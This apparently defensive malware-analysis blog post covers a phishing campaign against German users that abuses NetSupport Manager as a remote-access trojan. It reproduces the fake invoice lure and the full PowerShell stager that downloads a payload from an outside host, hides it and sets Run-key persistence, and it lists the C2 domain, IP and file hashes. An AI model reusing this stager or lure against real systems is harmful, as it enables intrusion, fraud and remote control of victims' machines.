Maurizio Ruchay

NetSupport Manager is a legitimate remote control software that is developed by a UK-based company. However, as uncovered in this analysis, the software is used in a currently active phishing campaign against German users.

Malware Distribution

The malware is initially distributed via e-mail as a fake invoice, as shown in the following screenshot:

Example of fake invoice containing malware

An English translation of the mail reads:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17



Dear Sir or Madam,

I hope you are well. I am writing to you today to remind you of an outstanding invoice.
According to our records, we have not yet received your last invoice dated March 15, 2023.

Please transfer the amount of 808.59 € to our account as soon as possible.
You will find the bank details on the attached invoice.

Please note that the invoice is protected with the password \"1\".
You need the password to open and view the invoice.

If you have already made the payment, please ignore this message.

We would like to remind you that the payment deadline has already passed.
We would appreciate it if you could pay this invoice as soon as possible to avoid late payment interest.

Thank you for your attention and understanding.






The e-mail is written in ordinary language. However, the over-friendly and lengthy phrases are reminiscent of an AI-generated text.

The AI Text Classifier of OpenAI states that the e-mail has likely been generated by an AI.



OpenAI Text Classifier
Malware Stager
The actual malware is attached to the e-mail in the form of a password-protected ZIP archive (bestellung_260778.zip).


Malware distributed in a password-protected ZIP archive
This password is communicated to a potential victim in the e-mail text. The password protection is likely used by the attackers in order to obfuscate the payload, and to prevent early detection by antivirus software on mail servers.
When unpacked, the ZIP archive contains a small Batch script named Rechnung herunterladen.bat, and a hidden folder called Rechnung (English: invoice) containing a PowerShell script named LM1.ps1.



Components of the malware stager
If a user executes the Batch script Rechnung herunterladen.bat (“download invoice.bat”), the PowerShell script LM.ps1 will be started. The code of this script can be found in the following section.
Malware Implant and Persistence
The following script is used to download and start the implant:
1
2
3
4
5
6
7
8
9
10
11
12
13



cd $env:AppData;
$link=\"https://[REDACTED]/baot.zip\";
$path=$env:APPDATA+\"tr.zip\";
$pzip=$env:APPDATA+\"ONEN0TEupdate\";
Start-BitsTransfer -Source $link -Destination $Path;
expand-archive -path .tr.zip -destinationpath $pzip;
$FOLD=Get-Item $pzip -Force;
$FOLD.attributes=\'Hidden\';
Remove-Item -path $path;
cd $pzip;
start client32.exe;
$fstr=$pzip+\"client32.exe\";
New-ItemProperty -Path \"HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun\" -Name \"ONEN0TEupdate\" -Value $fstr  -PropertyType \"String\";






This PowerShell script will download the payload https://[REDACTED]/baot.zip. This payload is then extracted to the hidden folder $env:AppDataONEN0TEupdate (with the letter “zero”). After that, the implant executable client32.exe is started. As a persistence mechanism, the registry key HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun is configured to run the implant client32.exe.
Especially noteworthy is that the Cmdlet Start-BitsTransfer is used in order to download the payload. This is a Cmdlet that can be used to transfer files. However, it is more exotic than commonly used methods like Invoke-WebRequest or Certutil.exe for this purpose.
Command and Control Infrastructure
The implant is the “NetSupport Client Application”, which is a signed executable by “NetSupport Ltd”. The configuration file client32.ini contains the URI of the command and control (C2) server (balbalz1.com:5222), as shown in the following figure:



NetSupport RAT configuration
According to the whois entry, this server is hosted by AEZA GROUP LLC and is located in Krasnodar, Russia.
1
2
3
4
5
6
7
8
9
10
11
12
13



$ dig +short balbalz1.com
79.137.207.54

$ whois 79.137.207.54
[...]
inetnum:        79.137.207.0 - 79.137.207.255
netname:        Aeza-Network
[...]
organisation:   ORG-AGL38-RIPE
org-name:       AEZA GROUP LLC
org-type:       OTHER
address:        350001, Krasnodar, st. im. Mayakovskogo, b. 160, office 2.4
[...]






Indicators of Compromise (IOCs)
The following sections list known IOCs for this malware sample.
Files



File
SHA256 hash




$env:APPDATAONEN0TEupdateclient32.ini
6C4826EEB2F400D0BA8C4439A069F8BA6C46AEF61A5261258E0F7AA376247567


baot.zip
26CAD4EC29BC07D7B2C32C94DBBEF397391BABF1C78CC533950B325AAF11BBA8


bestellung_260778.zip
6BB8DC2D99C2BBFCC6BFFC8BD38A4A1C167857782E8FE00ED08BA1FB83E0211A


bestellung_260778RechnungLM.ps1
944F56B306F67FEBA5DBF3B828181DA056477B07A1DECB1700607C1D3CF40E20


bestellung_260778Rechnung herunterladen.bat
744160A09FC5B16DA7DFEB02878F1EF8C1E87464E98AA604F20EC7FF426EC0B1



C2 servers

balbalz1[.]com
79[.]137[.]207[.]54

References

Start-BitsTransfer Cmdlet: https://learn.microsoft.com/en-us/powershell/module/bitstransfer/start-bitstransfer


Source: /TAR-troppuSteN-sisylana-erawlam/stsop/moc.ssys.golb